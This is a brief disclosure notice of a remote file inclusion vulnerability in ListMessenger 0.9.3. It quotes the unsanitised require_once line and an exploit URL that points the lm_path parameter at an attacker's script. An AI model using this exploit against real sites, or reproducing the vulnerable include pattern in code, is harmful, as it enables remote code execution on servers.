ListMessenger v0.9.3 Remote File Inclusion Vulnerability

-

Discoverd By : xoron

-

Conatact : x0r0n[at]hotmail.com

-

script: ListMessenger 0.9.3 

-

URL: http://www.listmessenger.com

-

Exp: www.target.com/[path]/enduser/listmessenger.php?lm_path=evil_script?

-

Code:  require_once($lm_path."config.inc.php")

-

XORON - Cyber-Warrior.org